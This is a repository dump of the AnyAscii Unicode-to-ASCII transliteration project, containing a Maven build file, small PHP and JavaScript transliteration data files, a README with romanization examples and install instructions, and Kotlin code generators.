std::env::args().skip(1).collect::<Vec<_>>();\n\n if args.is_empty() {\n println!(\n \"{}\\n{}\\n{}\\n{}\",\n env!(\"CARGO_PKG_NAME\"),\n env!(\"CARGO_PKG_VERSION\"),\n env!(\"CARGO_PKG_DESCRIPTION\"),\n env!(\"CARGO_PKG_HOMEPAGE\")\n );\n } else {\n println!(\"{}\", any_ascii(&args.join(\" \")));\n }\n}\n" }, { "alpha_fraction": 0.4766462445259094, "alphanum_fraction": 0.4923430383205414, "avg_line_length": 35.29166793823242, "blob_id": "4b941185727f49f5d02c0ced1e4adfe41384481b", "content_id": "5838e8c8854b623d51c0a97d6d331053e7a13d30", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Maven POM", "length_bytes": 2612, "license_type": "permissive", "max_line_length": 108, "num_lines": 72, "path": "/pom.xml", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n\n <groupId>com.anyascii</groupId>\n <artifactId>anyascii-build</artifactId>\n <version>0.1.7-SNAPSHOT</version>\n\n <properties>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n <version.kotlin>1.3.72</version.kotlin>\n <version.java>11</version.java>\n </properties>\n\n <dependencies>\n <dependency>\n <groupId>org.jetbrains.kotlin</groupId>\n <artifactId>kotlin-stdlib</artifactId>\n <version>${version.kotlin}</version>\n </dependency>\n <dependency>\n <groupId>com.ibm.icu</groupId>\n <artifactId>icu4j</artifactId>\n <version>67.1</version>\n </dependency>\n <dependency>\n <groupId>com.fasterxml.jackson.module</groupId>\n <artifactId>jackson-module-kotlin</artifactId>\n <version>2.10.3</version>\n </dependency>\n </dependencies>\n <build>\n <plugins>\n <plugin>\n <groupId>org.jetbrains.kotlin</groupId>\n <artifactId>kotlin-maven-plugin</artifactId>\n <version>${version.kotlin}</version>\n <executions>\n <execution>\n <id>compile</id>\n <phase>process-sources</phase>\n <goals>\n <goal>compile</goal>\n </goals>\n </execution>\n </executions>\n <configuration>\n <jvmTarget>${version.java}</jvmTarget>\n </configuration>\n </plugin>\n <plugin>\n <groupId>org.codehaus.mojo</groupId>\n <artifactId>exec-maven-plugin</artifactId>\n <version>1.6.0</version>\n <executions>\n <execution>\n <id>exec</id>\n <phase>package</phase>\n <goals>\n <goal>java</goal>\n </goals>\n </execution>\n </executions>\n <configuration>\n <mainClass>com.anyascii.build.MainKt</mainClass>\n </configuration>\n </plugin>\n </plugins>\n </build>\n</project>" }, { "alpha_fraction": 0.2921348214149475, "alphanum_fraction": 0.2921348214149475, "avg_line_length": 89, "blob_id": "35cba63907695249a72f9e89ff7124c77b5d12bd", "content_id": "3f7f534e1aae96784460d2307bf24e015425d22c", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 89, "license_type": "permissive", "max_line_length": 89, "num_lines": 1, "path": "/php/_data/_2e0.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLao\t\t\t\t\t\tGun\t\t\t\t\t\t\t\tGeng');" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 40, "blob_id": "d2a4ee0a99e65a267124e9bec1184e3f821c455b", "content_id": "7fce88704017694d7abbee34e18d6f8fa2cced16", "detected_licenses": [ "ISC" ], 
"is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 40, "license_type": "permissive", "max_line_length": 40, "num_lines": 1, "path": "/js/data/2dd.js", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module.exports='\t\t\t\t\t\t\t\t\t\tWu'.split('\t')" }, { "alpha_fraction": 0.7552728652954102, "alphanum_fraction": 0.7623307108879089, "avg_line_length": 38.68404006958008, "blob_id": "efd2052f97c219d75a6c67eb564d4cd01f83614b", "content_id": "d7db437720655e74def497c68369a2b7be448bea", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12710, "license_type": "permissive", "max_line_length": 238, "num_lines": 307, "path": "/README.md", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "# AnyAscii [![build](https://travis-ci.org/anyascii/anyascii.svg?branch=master)](https://travis-ci.org/anyascii/anyascii)\n[![jitpack](https://img.shields.io/jitpack/v/github/anyascii/anyascii)](https://jitpack.io/#com.anyascii/anyascii)\n[![npm](https://img.shields.io/npm/v/any-ascii)](https://www.npmjs.com/package/any-ascii)\n[![packagist](https://img.shields.io/packagist/v/anyascii/anyascii)](https://packagist.org/packages/anyascii/anyascii)\n[![pypi](https://img.shields.io/pypi/v/anyascii)](https://pypi.org/project/anyascii/)\n[![gem](https://img.shields.io/gem/v/any_ascii)](https://rubygems.org/gems/any_ascii)\n[![crates.io](https://img.shields.io/crates/v/any_ascii)](https://crates.io/crates/any_ascii)\n[![nuget](https://img.shields.io/nuget/v/AnyAscii)](https://www.nuget.org/packages/AnyAscii)\n\nUnicode to ASCII transliteration\n\n[**Web Demo**](https://anyascii.com)\n\n#### Table of Contents\n\n* [Description](#description)\n[Examples](#examples)\n[Background](#background)\n[Details](#details)\n* [Implementations](#implementations):\n[Go](#go)\n[Java](#java)\n[JavaScript](#javascript)\n[PHP](#php)\n[Python](#python)\n[Ruby](#ruby)\n[Rust](#rust)\n[Shell](#shell)\n[.NET](#net)\n* [Unidecode](#unidecode)\n[See Also](#see-also)\n\n## Description\n\nConverts Unicode text to a reasonable representation using only ASCII.\n\nFor most characters in Unicode, AnyAscii provides an ASCII-only replacement string.\nText is converted character-by-character without considering the context.\nThe mappings for each script are based on popular existing romanization schemes.\nSymbolic characters are converted based on their meaning or appearance.\nAll ASCII characters in the input are left unchanged,\nevery other character is replaced with printable ASCII characters.\nUnknown characters are removed.\n\n## Examples\n\nRepresentative examples for different languages comparing the AnyAscii output to the conventional romanization.\n\n|Language (Script)|Input|Output|Conventional|\n|---|---|---|---|\n|French (Latin)|René François Lacôte|Rene Francois Lacote|Rene Francois Lacote|\n|German (Latin)|Großer Hörselberg|Grosser Horselberg|Grosser Hoerselberg|\n|Vietnamese (Latin)|Trần Hưng Đạo|Tran Hung Dao|Tran Hung Dao|\n|Norwegian (Latin)|Nærøy|Naeroy|Naroy|\n|Ancient Greek (Greek)|Φειδιππίδης|Feidippidis|Pheidippides|\n|Modern Greek (Greek)|Δημήτρης Φωτόπουλος|Dimitris Fotopoylos|Dimitris Fotopoulos|\n|Russian (Cyrillic)|Борис Николаевич Ельцин|Boris Nikolaevich El'tsin|Boris Nikolayevich Yeltsin|\n|Ukrainian (Cyrillic)|Володимир Горбулін|Volodimir Gorbulin|Volodymyr Horbulin|\n|Bulgarian (Cyrillic)|Търговище|T'rgovishche|Targovishte|\n|Mandarin Chinese (Han)|深圳|ShenZhen|Shenzhen|\n|Cantonese Chinese 
(Han)|深水埗|ShenShuiBu|Sham Shui Po|\n|Korean (Hangul)|화성시|HwaSeongSi|Hwaseong-si|\n|Korean (Han)|華城市|HuaChengShi|Hwaseong-si|\n|Japanese (Hiragana)|さいたま|saitama|Saitama|\n|Japanese (Han)|埼玉県|QiYuXian|Saitama-ken|\n|Japanese (Katakana)|トヨタ|toyota|Toyota|\n|Amharic (Ethiopic)|ደብረ ዘይት|debre zeyt|Dobre Zeyit|\n|Tigrinya (Ethiopic)|ደቀምሓረ|dek'emhare|Dekemhare|\n|Arabic|دمنهور|dmnhwr|Damanhur|\n|Armenian|Աբովյան|Abovyan|Abovyan|\n|Georgian|სამტრედია|samt'redia|Samtredia|\n|Hebrew|אברהם הלוי פרנקל|'vrhm hlvy frnkl|Abraham Halevi Fraenkel|\n|Manding (N'Ko)|ߞߐߣߊߞߙߌ߫|konakri|konakiri|\n|Unified English Braille (Braille)|⠠⠎⠁⠽⠀⠭⠀⠁⠛|+say x ag|Say it again|\n|Bengali|ময়মনসিংহ|mymnsimh|Mymensingh|\n|Burmese (Myanmar)|ထန်တလန်|htntln|Thantlang|\n|Gujarati|પોરબંદર|porbmdr|Porbandar|\n|Hindi (Devanagari)|महासमुंद|mhasmumd|Mahasamund|\n|Kannada|ಬೆಂಗಳೂರು|bemgluru|Bengaluru|\n|Khmer|សៀមរាប|siemrab|Siem Reap|\n|Lao|ສະຫວັນນະເຂດ|sahvannaekhd|Savannakhet|\n|Malayalam|കളമശ്ശേരി|klmsseri|Kalamassery\n|Odia|ଗଜପତି|gjpti|Gajapati|\n|Punjabi (Gurmukhi)|ਜਲੰਧਰ|jlmdhr|Jalandhar|\n|Sinhala|රත්නපුර|rtnpur|Ratnapura|\n|Tamil|கன்னியாகுமரி|knniyakumri|Kanniyakumari|\n|Telugu|శ్రీకాకుళం|srikakulm|Srikakulam|\n|Thai|สงขลา|sngkhla|Songkhla|\n\n|Symbols|Input|Output|\n|---|---|---|\n|Emojis|😎 👑 🍎|`:sunglasses: :crown: :apple:`|\n|Misc.|☆ ♯ ♰ ⚄ ⛌|* # + 5 X|\n|Letterlike|№ ℳ ⅋ ⅍|No M & A/S|\n\n## Background\n\n> Unicode is the foundation for text in all modern software:\n> it’s how all mobile phones, desktops, and other computers represent the text of every language.\n> People are using Unicode every time they type a key on their phone or desktop computer, and every time they look at a web page or text in an application.\n> [*](https://www.unicode.org/reports/tr51/#Encoding)\n\n[Unicode](https://en.wikipedia.org/wiki/Unicode) is the universal character set, a global standard to support all the world's languages.\nIt contains 140,000+ characters used by 150+ scripts along with emojis and various symbols.\nTypically encoded into bytes using [UTF-8](https://en.wikipedia.org/wiki/UTF-8).\n\n[ASCII](https://en.wikipedia.org/wiki/ASCII) is the most compatible character set, established in 1967.\nIt is a subset of Unicode and UTF-8 consisting of 128 characters using 7-bits.\nThe [printable](https://en.wikipedia.org/wiki/ASCII#Printable_characters) characters are English letters, digits, and punctuation,\nwith the remaining being [control characters](https://en.wikipedia.org/wiki/ASCII#Control_characters).\nThe characters found on a standard US keyboard correspond to the printable ASCII characters.\n\n> ... 
expressed only in the original non-control ASCII range so as to be as widely compatible with as many existing tools, languages, and serialization formats as possible and avoid display issues in text editors and source control.\n> [*](https://spec.graphql.org/June2018/#sec-Source-Text)\n\nA language is written using characters from a specific [script](https://en.wikipedia.org/wiki/Writing_system).\nA script can be [alphabetic](https://en.wikipedia.org/wiki/Alphabet), [logographic](https://en.wikipedia.org/wiki/Logogram), [syllabic](https://en.wikipedia.org/wiki/Syllabary), or something else.\nSome languages use multiple scripts: Japanese uses Kanji, Hiragana, and Katakana.\nSome scripts are used by multiple languages: [Han characters](https://en.wikipedia.org/wiki/Chinese_characters) are used in Chinese, Japanese, and Korean.\nThe script used by English and ASCII is known as the [Latin script](https://en.wikipedia.org/wiki/Latin_script).\n\nWhen converting text between languages there are multiple properties that can be preserved:\n- Meaning: [Translation](https://en.wikipedia.org/wiki/Translation)\n- Appearance: Preserving the visual appearance of characters when converting between scripts is rarely possible and requires readers to have knowledge of the source language.\n- Sound: [Transcription](https://en.wikipedia.org/wiki/Orthographic_transcription) uses the spelling and pronunciation rules of the target language to produce text that will be pronounced as accurately as possible to the original.\n- Spelling: [Transliteration](https://en.wikipedia.org/wiki/Transliteration) converts each character individually using predictable rules.\n A reversible transliteration allows for reconstruction of the original text by using unique mappings for each character.\n\n[Romanization](https://en.wikipedia.org/wiki/Romanization) is the conversion into the Latin script using transliteration or transcription or a mix of both.\nRomanization is most commonly used when representing the names of people and places.\n\n> _South Korea's Ministry of Culture & Tourism_:\n> Clear to anyone, Romanization is for foreigners.\n> Geographical names are Romanized to help foreigners find the place they intend to go to and help them remember cities, villages and mountains they visited and climbed.\n> But it is Koreans who make up the Roman transcription of their proper names to print on their business cards and draw up maps for international tourists.\n> Sometimes, they write the lyrics of a Korean song in Roman letters to help foreigners join in a singing session or write part of a public address (in Korean) in Roman letters for a visiting foreign VIP.\n> In this sense, it is for both foreigners and the local public.\n> The Romanization system must not be a code only for the native English-speaking community here but an important tool for international communication between Korean society, foreign residents in the country and the entire external world.\n> If any method causes much confusion because it is unable to properly reflect the original sound to the extent that different words are transcribed into the same Roman characters too frequently, it definitely is not a good system.\n> [*](https://web.archive.org/web/20070927204130/http://www.korea.net/korea/kor_loca.asp?code=A020303)\n\n## Details\n\n*Comprehensive*:\nSupports as many Unicode characters as possible.\nThe benefits of providing full support even for rare or historic characters outweighs the small overhead of including them.\n\n*Simple*:\nEasy to use, 
understand, and update.\nAble to be implemented with consistent behavior across multiple different programming languages.\nHas benefits for performance and data size.\n\n*Useful*:\nProvides reasonable approximations of the spelling or pronunciation.\nBased on popular romanization systems in general use.\n\n## Implementations\n\nAnyAscii is implemented in 9 different programming languages.\n\n### Go\n\n```go\nimport \"github.com/anyascii/go\"\n\ns := anyascii.Transliterate(\"άνθρωποι\")\n// anthropoi\n```\n\nGo 1.10+ Compatible\n\n### Java\n\n```java\nString s = AnyAscii.transliterate(\"άνθρωποι\");\n// anthropoi\n```\n\nJava 6+ compatible\n\nAvailable from [**JitPack**](https://jitpack.io/#com.anyascii/anyascii)\n\n### JavaScript\n\n##### Node.js\n\n```javascript\nconst anyAscii = require('any-ascii');\n\nconst s = anyAscii('άνθρωποι');\n// anthropoi\n```\n\nNode.js 4.0+ compatible\n\nInstall: `npm install any-ascii`\n\n### PHP\n\n```php\n$s = AnyAscii::transliterate('άνθρωποι');\n// anthropoi\n```\n\nPHP 5.3+ compatible\n\nInstall: `composer require anyascii/anyascii`\n\n### Python\n\n```python\nfrom anyascii import anyascii\n\ns = anyascii('άνθρωποι')\n# anthropoi\n```\n\nPython 3.3+ compatible\n\nInstall: `pip install anyascii`\n\n### Ruby\n\n```ruby\nrequire 'any_ascii'\n\ns = AnyAscii.transliterate('άνθρωποι')\n# anthropoi\n```\n\nRuby 2.0+ compatible\n\nInstall: `gem install any_ascii`\n\n### Rust\n\n```rust\nuse any_ascii::any_ascii;\n\nlet s = any_ascii(\"άνθρωποι\");\n// anthropoi\n```\n\nRust 1.20+ compatible\n\nInstall:\n```toml\n# Cargo.toml\n[dependencies]\nany_ascii = \"0.1.6\"\n```\n\n##### CLI\n\n```console\n$ anyascii άνθρωποι\nanthropoi\n```\n\nUse `cd rust && cargo build --release` to build a native executable to `rust/target/release/anyascii`\n\n### Shell\n\n```console\n$ anyascii άνθρωποι\nanthropoi\n```\n\nPOSIX-compliant\n\n[**Download**](https://github.com/anyascii/anyascii/blob/master/sh/anyascii)\n\n### .NET\n\nInstall from [**NuGet**](https://www.nuget.org/packages/AnyAscii)\n\n##### C#\n\n```cs\nusing AnyAscii;\n\nstring s = \"άνθρωποι\".Transliterate();\n// anthropoi\n```\n\n## Unidecode\n\nAnyAscii is an alternative to (and inspired by) [Unidecode](https://metacpan.org/pod/Text::Unidecode) and its many [ports](https://github.com/search?q=unidecode).\nAnyAscii is more up-to-date and supports more than twice as many characters.\nUnidecode was originally written in 2001 with minor updates through 2016.\nIt does not support any characters outside of the [BMP](https://en.wikipedia.org/wiki/Plane_(Unicode)#Basic_Multilingual_Plane).\n\nCompare `table.tsv` and `unidecode/table.tsv` for a complete comparison between AnyAscii and Unidecode.\nNote that the Unidecode output has been [modified slightly](unidecode/Unidecode.pl) and that unknown characters are replaced by `\"[?] \"` while they are removed by AnyAscii.\n\n## See Also\n\n[ALA-LC: Romanization Tables](https://www.loc.gov/catdir/cpso/roman.html) \n[BGN/PCGN: Guidance on Romanization Systems](https://www.gov.uk/government/publications/romanization-systems) \n[Discord: Emojis](https://github.com/anyascii/discord-emojis) \n[ISO: Transliteration Standards](https://www.iso.org/ics/01.140.10/x/p/1/u/1/w/1/d/1) \n[KNAB: Romanization Systems](https://www.eki.ee/knab/kblatyl2.htm) \n[Thomas T. 
Pedersen: Transliteration of Non-Roman Scripts](http://transliteration.eki.ee/) \n[UNGEGN: Working Group on Romanization Systems](https://www.eki.ee/wgrs/) \n[Unicode Technical Site](https://unicode.org/main.html) \n[Wikipedia: Romanization](https://www.google.com/search?q=site:en.wikipedia.org+romanization+OR+transliteration) \n[Wiktionary: Romanization](https://www.google.com/search?q=site:en.wiktionary.org+romanization+OR+transliteration) \n" }, { "alpha_fraction": 0.5517536401748657, "alphanum_fraction": 0.557741641998291, "avg_line_length": 32.42856979370117, "blob_id": "c7d4ec66caeb3202d78356528b9f0f5c72598fc6", "content_id": "4d388ee9633a0a3ed3b26239bc04102634dae095", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1169, "license_type": "permissive", "max_line_length": 93, "num_lines": 35, "path": "/src/main/java/com/anyascii/build/gen/Java.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport java.nio.file.Files\nimport java.nio.file.Path\n\nfun java(g: Generator) {\n val resources = Path.of(\"java/src/main/resources/com/anyascii\")\n resources.toFile().deleteRecursively()\n Files.createDirectories(resources)\n\n for ((blockNum, block) in g.blocks) {\n Files.newBufferedWriter(resources.resolve(\"%03x\".format(blockNum))).use { w ->\n for (s in block) {\n w.write(s)\n w.write(0)\n }\n }\n }\n\n Files.newBufferedWriter(Path.of(\"java/src/main/java/com/anyascii/Block.java\")).use { w ->\n w.write(\"package com.anyascii;\\n\\n\")\n w.write(\"final class Block {\\n\\n\")\n w.write(\"\\tstatic final String[][] blocks = new String[${g.blocks.size}][];\\n\\n\")\n w.write(\"\\tstatic int block(int blockNum) {\\n\")\n w.write(\"\\t\\tswitch (blockNum) {\\n\")\n for ((i, block) in g.blocks.keys.withIndex()) {\n val s = \"%03x\".format(block)\n w.write(\"\\t\\t\\tcase 0x$s: return $i;\\n\")\n }\n w.write(\"\\t\\t\\tdefault: return -1;\\n\")\n w.write(\"\\t\\t}\\n\")\n w.write(\"\\t}\\n\")\n w.write(\"}\\n\")\n }\n}" }, { "alpha_fraction": 0.4390243887901306, "alphanum_fraction": 0.4390243887901306, "avg_line_length": 41, "blob_id": "496aa3e46d538b52f42d1702a3381bad7c64cdb5", "content_id": "53638d965f414d15635c2efc5f784b53f12fbb8b", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 41, "license_type": "permissive", "max_line_length": 41, "num_lines": 1, "path": "/php/_data/_2dd.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\tWu');" }, { "alpha_fraction": 0.44661378860473633, "alphanum_fraction": 0.46125686168670654, "avg_line_length": 29.644859313964844, "blob_id": "07afc9e17c9ca029607e64ad5de459cc613840d8", "content_id": "6def79670a72a575e8c8d142c5ff9f41b007737a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3278, "license_type": "permissive", "max_line_length": 123, "num_lines": 107, "path": "/src/main/java/com/anyascii/build/gen/Generator.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport com.anyascii.build.Table\nimport com.anyascii.build.asString\nimport com.anyascii.build.isAscii\nimport com.anyascii.build.lengthStatistics\nimport java.io.ByteArrayOutputStream\nimport java.io.DataOutputStream\nimport java.util.TreeMap\n\nfun generate(table: Table) {\n val g = Generator(table)\n java(g)\n python(g)\n js(g)\n 
rust(g)\n go(g)\n ruby(g)\n cSharp(g)\n shell(g)\n php(g)\n}\n\nclass Generator(val table: Table) {\n\n val blocks = blocks()\n\n val stringsBank = stringsBank()\n\n val blockPointers = blockPointers()\n\n private fun blocks(): Map<Int, List<String>> {\n val m = TreeMap<Int, List<String>>()\n for (b in 0..0xFFF) {\n val block = List(256) { table[(b shl 8) or it] ?: \"\" }\n .dropLastWhile { it.isEmpty() }\n .mapIndexed { i, s -> if (b == 0 && i.isAscii()) \"\" else s }\n if (block.isEmpty()) continue\n m[b] = block\n }\n return m\n }\n\n private fun stringsBank(): String {\n val sb = StringBuilder()\n val ss = table.values.filter { it.length > 3 }\n val ss2 = ss.filter { a -> ss.none { b -> a != b && a in b } }.sortedBy { it.length }.toCollection(LinkedHashSet())\n while (ss2.isNotEmpty()) {\n val m = ss2.maxBy { overlap(sb, it) }!!\n ss2.remove(m)\n check(m !in sb)\n sb.append(m, overlap(sb, m), m.length)\n }\n check(ss.all { it in sb })\n return sb.toString()\n }\n\n private fun overlap(a: CharSequence, b: String): Int {\n for (i in (b.length - 1).downTo(1)) {\n if (a.endsWith(b.substring(0, i))) {\n return i\n }\n }\n return 0\n }\n\n private fun blockPointers(): Map<Int, ByteArray> {\n check(table.lengthStatistics().max <= 0x7f)\n check((stringsBank.length shr 16) == 0)\n val m = TreeMap<Int, ByteArray>()\n for ((blockNum, blockStrings) in blocks) {\n val out = ByteArrayOutputStream()\n val d = DataOutputStream(out)\n for ((lo, s0) in blockStrings.withIndex()) {\n val cp = (blockNum shl 8) or lo\n val s = if (cp.isAscii()) cp.asString() else s0\n when (s.length) {\n 0 -> {\n d.writeShort(0)\n d.writeByte(0x80)\n }\n 1 -> {\n d.writeByte(s[0].toInt())\n d.writeByte(0)\n d.writeByte(0x81)\n }\n 2 -> {\n d.writeByte(s[0].toInt())\n d.writeByte(s[1].toInt())\n d.writeByte(0x82)\n }\n 3 -> {\n d.writeByte(s[0].toInt())\n d.writeByte(s[1].toInt())\n d.writeByte(s[2].toInt())\n }\n else -> {\n d.writeShort(stringsBank.indexOf(s))\n d.writeByte(0x80 or s.length)\n }\n }\n }\n m[blockNum] = out.toByteArray()\n }\n return m\n }\n}" }, { "alpha_fraction": 0.3396226465702057, "alphanum_fraction": 0.3396226465702057, "avg_line_length": 53, "blob_id": "67016db3ed38d34d866212e223d85dbfbe334456", "content_id": "c3bafab6feb5e74097c1fefef1b3860b9ec3657a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 53, "license_type": "permissive", "max_line_length": 53, "num_lines": 1, "path": "/php/_data/_2d0.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLi');" } ]
30
zhulh200868/day05
https://github.com/zhulh200868/day05
cf93df169eacce37adb1078e60284a73b1ba239e
76daf5fe1f322fe9396415fb18ca228d7b7a56c5
2636f33e55c63feb2ec81ac6f06dacf8290d86d6
refs/heads/master
2016-06-03T01:59:50.348943
2016-02-26T05:47:20
2016-02-26T05:47:20
52,581,728
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.27695024013519287, "alphanum_fraction": 0.32081249356269836, "avg_line_length": 33.665306091308594, "blob_id": "8d8ffedcb7c7cc65e85207e2704a9c8cff8c51f7", "content_id": "fedd7bbac7c10ce0ca3b1b4946c9ec5d9dcedb1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 23607, "license_type": "no_license", "max_line_length": 108, "num_lines": 490, "path": "/readme.txt", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "本节作业day05\n##本程序基于python 2.7和Linux开发,需运行在python2.x和linux系统环境下###\n\n作业需求:\n模拟实现一个ATM + 购物商城程序\n\n额度 15000或自定义\n实现购物商城,买东西加入 购物车,调用信用卡接口结账\n可以提现,手续费5%\n每月22号出账单,每月10号为还款日,过期未还,按欠款总额 万分之5 每日计息\n支持多账户登录\n支持账户间转账\n记录每月日常消费流水\n提供还款接口\nATM记录操作日志\n提供管理接口,包括添加账户、用户额度,冻结账户等。。。\n账号、密码、信用卡额度、余额都存储在mysql下python库中的user表中。\n并将购物、还款信息记录到log.txt文件中\n\n\n-----------程序执行前提条件:\n 需要安装程序mysqlserver,python的MySQL模块,并使用user.sql创建数据库和表,以及插入一些初始化数据。\n 需要修改setting.py文件中连接mysql的参数。\nuser表字段说明:\n`name` ----信用卡账号\n`password` ----密码\n`salary` ----信用卡额度\n`money` ----信用卡余额\n`status` ----信用卡是否冻结状态\n`lock_time` ----信用卡锁定时间\n`interest` ----利息\n`str_interest` ----是否计息标志\n\n-----------程序结构说明:\n[root@master day05]# tree\n|-- apis\n| |-- Caltimes.py\t\t\t\t\t\t ----时间换算程序\n| |-- logger.py\t\t\t\t\t\t\t----日志记录程序\n| |-- mysql.py\t\t\t\t\t\t\t----操作mysql的程序\n| |-- passwd_getpass.py\t\t\t ----将输入的密码转换成星号*程序\n| |-- sendemail.py\t\t\t\t\t ----email发送程序\n| |-- tab.py\t\t\t\t\t\t\t\t----tab补全功能程序\n|-- auto_calc.py\t\t\t\t\t\t\t----出账单和计息程序,一个后台进程\n|-- config\n| |-- setting.py\t\t\t\t\t\t ----配置文件\n|-- core\n| |-- atm.py\t\t\t\t\t\t\t\t----atm主程序,实现提现、转账、还款\n| |-- login.py\t\t\t\t\t\t\t----登陆验证程序\n| |-- manager.py\t\t\t\t\t\t ----管理员界面程序\n| |-- register.py\t\t\t\t\t\t ----注册添加账号程序\n| |-- shopping.py\t\t\t\t\t\t ----购物商城程序\n|-- log.txt\t\t\t\t\t\t\t\t\t----日志文件\n|-- readme.txt\t\t\t\t\t\t\t\t----readme文件\n|-- user.sql ----用户初始化脚本\n`-- user_main.py\t\t\t\t\t\t\t----项目主程序入口\n\n\n-----------ATM余额显示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):echo\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为891.5\n\n-----------ATM提现:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! 
###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):jack2\n请输入您的密码(退出请输入'q'):*******\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为14218.0\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 2\n请输入您需要提现的额数:500\n您提现的额数为:500元,本次提现成功,并收取25.0元的手续费!\n你现在的余额为:13693.0\n\n-----------ATM转账:\n从jack账号转500到echo账号\n\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):echo\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为366.5 ------------------这里echo账号为366.5\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 6\nGOODBye!\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! 
###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):jack\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为11881 ------------------这里jack账号为11881\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 3\n请输入您想转给谁?:echo\n请输入您转账的金额:500\n本次转账成功!因为是本行内转账不收取任何手续费!\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为11381.0 ------------------这里jack账号为11381\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 